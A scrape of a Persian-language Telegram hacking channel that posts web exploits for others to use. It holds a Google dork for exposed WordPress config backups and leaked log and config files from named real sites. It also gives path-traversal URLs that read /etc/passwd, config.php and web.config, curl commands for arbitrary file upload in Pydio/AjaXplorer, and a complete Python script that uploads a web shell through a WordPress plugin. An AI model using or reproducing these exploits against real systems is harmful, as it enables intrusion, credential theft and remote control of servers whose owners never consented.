0Day.Today | Learn Exploit | Zero World | Dark web |
18.7K subscribers
1.23K photos
122 videos
487 files
1.26K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
#DoRk - #Wp_Config (.bak = backup file ) #file
——
> Dork :
inurl:wp-config.bak
——
> POC :
دوستان با این دورک میتونید به فایل backup وردپرس بعضی سایت ها دسترسی داشته باشید.
نحوه ی استفاده :
به دو دیتابیس توجه کنید :
define('DB_USER', '##');
define('DB_PASSWORD', '##');
——
> Like :
http://www.malwarehelp.org/blog/wp-config.bak
================
Our Is Here ( 0Day.Today Boy's :) )
@ L E A R N E X P L O I T - T.me/LearnExploit
is.muni.cz.auth.log.txt
10.4 MB
#Target #Log #File :
————————-
Target :
https://is.muni.cz
————————-
@LearnExploit
#Arbitrary #File #Download #LFI #RFI #Modern_POS v1.3
—————————————————--
اسیب پذیری فایل دانلود در Modern POS 1.3
=================================
نحوه ی اسکپلویت کردن :::
http://localhost/[PATH]/_inc/bridges/php-local/index.php?action=download&path=[FILE]
///———————
http://localhost/[PATH]/
این قسمت دامین شما یا تارکت میباشد.

_inc/bridges/php-local/index.php?action=download&path=
با اضافه کردن این قسمت به اخر دامین به محل اسیب پذیری دسترسی پیدا میکنید.

[FILE]
در این قسمت دستورات مربوط به RFI or LFI رو وارد کنید مانند :::

_inc/bridges/php-local/index.php?action=download&path=../../../config.php

_inc/bridges/php-local/index.php?action=download&path=../../../../../../../../proc/self/environ
======================
لینک برنامه :
Program
(https://codecanyon.net/item/modern-pos-point-of-sale-with-stock-management-system/22702683)
لینک اکسپلویت ثبت شده :
Exploit
(https://www.exploit-db.com/exploits/46137)
======================
@ t.me/LearnExploit
@ IR0Day.Today Boy's (https://t.me/learnexploit)
🔺🔻🔸🔹🔶🔷
🔳🔲▪️▫️◾️
⬜️⬛️◻️◼️
◽️♦️🗨
♠️♣️
✔️

#File #Upload #Vulnerability in #Pydio_AjaXplorer (Pydio/AjaXplorer) V 5.0.3 – 3.3.5
————————————-

#~Exploit Title : Unauthenticated Arbitrary File Upload Vulnerability In Pydio/AjaXplorer 5.0.3 – 3.3.5
آسیب پذیری فایل اپلود در (Pydio/AjaXplorer) ورژن 5.0.3 – 3.3.5



#~Affected file :
فایل اسیب دیده : ( برای درک بهتر تصویر مطالعه شود !)
:::: `/plugins/editor.zoho/agent/save_zoho.php` ::::

<?php

$vars = array_merge($_GET, $_POST);

if(!isSet($vars["ajxp_action"]) && isset($vars["id"]) && isset($vars["format"])){
$filezoho = $_FILES['content']["tmp_name"];
$cleanId = str_replace(array("..", "/"), "", $vars["id"]);
move_uploaded_file($filezoho, "files/".$cleanId.".".$vars["format"]);
}else if($vars["ajxp_action"] == "get_file" && isSet($vars["name"])){
if(file_exists("files/".$vars["name"])){
readfile("files/".$vars["name"]);
unlink("files/".$vars["name"]);
}
}

?>

#~Options :
گزینه ها :
option 1 :
اگر ajxp_action تنظیم (ست) نشده باشد، فایل content رو به قسمت files/id.format اپلود کنید.
در این مورد کد قبل از اینکه فرمت فایل ها رو چک کنه فایل رو به عنوان یک ارگومان به بخش move_uploded_file میده .
که این میتونه فرصتی برای اپلود فایل خودتون باشه...
نکته : برای اینکه توانایی موارد بالا رو داتشه باشید باید کاربر دسترسی لازم برای ادیت فایل رو داشته باشه.

option 2 :
اگر ajxp_action در بخش get_file تنظیم شده باشد (ست شده باشد)، شما میتوانید فایل رو از files/name بخوانید و بخش مد نظر رو حذف کنید !
که در این حالت دوباره کد نمیتونه پارامتر name رو تشخیص بده که این موردم میتونه باگ باشه.

#~Filesdirectory's :
ادرس فایل :
ادرس پیشفرض فایل ها :
/plugins/editor.zoho/agent/files
ادرس پیشفرض برای خواندن فایل های اپلود شده :
/plugins/editor.zoho/data/files/

#~Read arbitrary files :
نحوه ی خواندن فایل :
curl "http://<url>/<ajaxplorer_wwwroot>/plugins/editor.zoho/agent/save_zoho.php?ajxp_action=get_file&name=<file_relative_path>"

مانند :

"http://muralito.el.payaso/ajaxplorer/plugins/editor.zoho/agent/save_zoho.php?ajxp_action=get_file&name=../../../../../../../../etc/passwd"

#~Arbitrary File Upload :
نحوه ی اپلود فایل دلخواه :
curl -F 'content=@<filename_from_attacker_host>;type=<filetype>;filename=\"<filename>\"' "http://<url>/<ajaxplorer_wwwroot>/plugins/editor.zoho/agent/save_zoho.php?id=&format=<upload_to_file_relative_path>"

مانند :

curl -F 'content=@test.html;type=text/html;filename=\"test.html\"' "http://muralito.el.payaso/ajaxplorer/plugins/editor.zoho/agent/save_zoho.php?id=&format=./../../../data/files/test.html"


با تشکر از همراهان عزیز.
Software link
Exploit link

————————————-
@LearnExploit - 0DayBoy 's in Iran :)
File.xml
1.5 KB
🔰 #XML #Injection (XMLi) #Tutorial #Vuln #Part_3 #XXE #File

فایل استفاده شده در اموزش
(از قلم افتاده 😁)

@LearnExploit 🌀
IR0Day.Today BOY'S
#Target #Config #File :)

#Target :
batikkratonmas.com

#Config File :
Download


Don't Forget ; I'm Here
IR0Day.Today
@LearnExploit
@Tech_Army
#Exploit #WebApp #HelloWeb #Arbitrary #File #Download #vulnerabilities
#اسیب_پذیری #برنامه_تحت_وب #بارگیری #فایل #دلخواه

با سلام خدمت دوستان عزیز
در این قسمت اسیب پذیری یافت شده در برنامه ی تحت وب به نام HelloWeb را مورد بررسی قرار دهیم.

IR0Day.Today Guy's
@LearnExploit
@Tech_Army
#Exploit #WebApp #HelloWeb #Arbitrary #File #Download #vulnerabilities
#اسیب_پذیری #برنامه_تحت_وب #بارگیری #فایل #دلخواه

با سلام خدمت دوستان عزیز
در این قسمت اسیب پذیری یافت شده در برنامه ی تحت وب به نام HelloWeb را مورد بررسی قرار دهیم.

ابتدا توضیح مختصری در مورد باگ Arbitrary File Download بدیم :
به زبان ساده اگر توضیح بدم نوع دیگری از باگ ها LFI/RFI میباشد.
با این تفاوت که شما در این باگ قابلیت Travel Dir رو‌ندارین! یعنی نمیتونید بین مسیرهای موجود گشت و گذار کنید و فقط میتونید فایل یا فایل های مد نظر رو دانلود کنید.(البته بعضی از پارامتر های موجود این قابلیت رو داره).
اگه هنوز با باگ های LFI و RFI اشنا نیستید روی لینک های زیر کلیک کنید.
Link

#Exploit-Title : ( HelloWeb 2.0 - Arbitrary File Download )

#Dork : ( Inurl:exec/file/download.asp )

#vulnerable-Code :

filepath = Request.QueryString("filepath")
filename = Request.QueryString("filename")
filepath = Replace(filepath,"/","\")

root_path = server.MapPath("/")
Set fso = CreateObject("Scripting.FileSystemObject")
Set root_folder = fso.GetFolder(root_path)

attachfile = root_path & filepath & "\" & filename

Response.Clear
Response.ContentType = "application/unknown"
Response.AddHeader "Pragma", "no-cache"
Response.AddHeader "Expires", "0"
Response.AddHeader "Content-Transfer-Encoding", "binary"
Response.AddHeader "Content-Disposition","attachment; filename = " & Server.URLPathEncode(filename)

Set objStream = Server.CreateObject("ADODB.Stream")
objStream.Open

objStream.Type = 1
objStream.LoadFromFile attachfile

Response.BinaryWrite objStream.Read
Response.Flush

طبق کد های مد نظر! این کد ها دسترسی دانلود فایل رو‌برای ما میده.
پارامتر هایی که اسیب‌پذیر هستند :
filtepath - filename - root_path - fso - root_folder - attachfile - objStream - strFile

چطوری میتوان از پارامترهای اسیب پذیر استفاده کرد :
به مثال زیر دقت کنید :
https://Target/download.asp?filepath=/&filename=hello.pdf

در این URL ما میفهمیم که فایل Download.asp اجازه ی دانلود فایل از مسیر / ( مسیر فعلی که ما هستیم)و فایل hello.pdf رو داده ...

نحوه ی اکسپلویت این باگ :
#Exploit :
ابتدا با استفاده از دورک‌ سایت اسیب پذیر رو پیدا کنید.
سپس
exec/file/download.asp?filepath=/&filename=web.config
رو‌به اخر هدفتون اضافه کنید.
البته این یک نمونه هست !
شما میتونید فایل های بیشتری رو‌ با پارامتر متفاوت تست کنید.

#PoC
تست :
این تست روی لوکال هاست صورت گرفته.

GET /exec/file/download.asp?filepath=/&filename=web.config HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

RESPONSE: (پاسخ)
HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/unknown; Charset=utf-8
Expires: 0,Thu, 09 Jul 2020 10:51:14 GMT
Server:
Content-Transfer-Encoding: binary
Content-Disposition: attachment; filename = web.config
Set-Cookie: ASPSESSIONIDQQCBDRBB=BEMDPMDDKFHNFKFMJGHIKKKI; path=/
Access-Control-Allow-Origin: *
x-xss-protection: 1; mode=block
Date: Thu, 09 Jul 2020 10:51:14 GMT
Connection: close

نحوه ی Fix این باگ تو پست بعدی براتون شرح میدم.
امیدوارم که با کارتون بیاد...
هرگونه سوالی داشتید میتونید توی گروه بپرسید.
#X0P4SH4

IR0Day.Today Guy's
@LearnExploit
@Tech_Army
آموزش آسیب پذیری file inclusion در Dvwa

#windows #dvwa #file_inclusion

iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
آموزش آسیب پذیری File Upload در Dvwa

* در این آموزش از Burp Suite هم استفاده شده است *

#windows #dvwa #File_Upload

iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
#WP #vulnerabilities #Vuln #File_Upload #Wordpress

آسیب پذیری فایل اپلود در افزونه ی Smart Product Review در نسخه 1.0.4

جهت مشاهده ی دمو بزنید.

دورک و تحلیل اسکریپت تو پست بعدی


IR0Day.Today Boy's
@LearnExploit
@Tech_Army
#WP #vulnerabilities #Vuln #File_Upload #Wordpress

آسیب پذیری فایل اپلود در افزونه ی Smart Product Review در نسخه 1.0.


#Google~Dork:
inurl: /wp-content/plugins/smart-product-review/


#Download~Script:
Download

خب بریم ببینیم این اسکریپت چطوری کار میکنه :

خب داره اینجا لایبرری ها رو‌اضافه میکنه

import os.path
from os import path
import json
import requests
import time
import sys



نمایشی از خودش را انداخته اینجا :|
def banner():
animation = "|/-\\"
for i in range(20):
time.sleep(0.1)
sys.stdout.write("\r" + animation[i % len(animation)])
sys.stdout.flush()
#do something
print("Smart Product Review 1.0.4 - Arbitrary File Upload")
print("Republice By : IR0Day.Today Channel")

def usage():
print("Usage: python3 exploit.py [target url] [your shell]")
print("Ex: python3 exploit.py https://example.com ./shell.(php4/phtml)")



خب اینجا داره فانکشینی مبنی بر چک کردن باگ تعریف میکنه
def vuln_check(uri):
response = requests.get(uri)
raw = response.text

if ("No script kiddies please!!" in raw):
return False;
else:
return True;


انجام امورات مهم :) اینجا صورت گرفته :
def main():

banner() # Banner ejra mishe
if(len(sys.argv) != 3): #Age toole vurudi kamtar az 3 ta bood
usage(); # ino nemayesh bede
sys.exit(1); # badesh kharej sho


base = sys.argv[1] #argoman 1 ke hamoon targete mesal : google.com
file_path = sys.argv[2] #argoman dovom (inm shelletone )

بعضی چیزارو واسه راحتی کار ریخته توی متغیر
ajax_action = 'sprw_file_upload_action'
admin = '/wp-admin/admin-ajax.php';


uri = base + admin + '?action=' + ajax_action ; #inja beham chasbunde
check = vuln_check(uri); # khob inja Chizaei ke chasbondaroo mifrestee be function check

بعده چک شدن حالا اگه False بود میزنه اسیب پذیر نیست و خارج میشه ولی اگه اسیب پذیر بود میزنن اسیب پذیره و خارج میشه 😐
if(check == False):
print("(*) Target not vulnerable!");
sys.exit(1)

if( path.isfile(file_path) == False):
print("(*) Invalid file!")
sys.exit(1)




اینجا یه دیکشنری تعریف میکنه که تو متد request لازمه ( البته از نوع پست )

files = {'files[]' : open(file_path)}
data = {
"allowedExtensions[0]" : "jpg",
"allowedExtensions[1]" : "php4",
"allowedExtensions[2]" : "phtml",
"allowedExtensions[3]" : "png",
"qqfile" : "files",
"element_id" : "6837",
"sizeLimit" : "12000000",
"file_uploader_nonce" : "2b102311b7"
}


print("Uploading Shell...");
response = requests.post(uri, files=files, data=data )

تو خط بالایی داره دیتا هارو میفرسته



بعده ارسال query چک میکنه که فایل شله هست اونجا یا نه اگه بود میزنه حله دهنشو سرویس کن نبود میگه بعدی... و خارج میشه

file_name = path.basename(file_path)
if("ok" in response.text):
print("Shell Uploaded!")
print("Shell URL on your Review/Comment");
else:
print("Shell Upload Failed")
sys.exit(1)

main();

خب این بود کل قضیه 😐🙌 بابا خیلی جدی نگیرید اینارو


IR0Day.Today Boy's
@LearnExploit
@TechArmy
👍2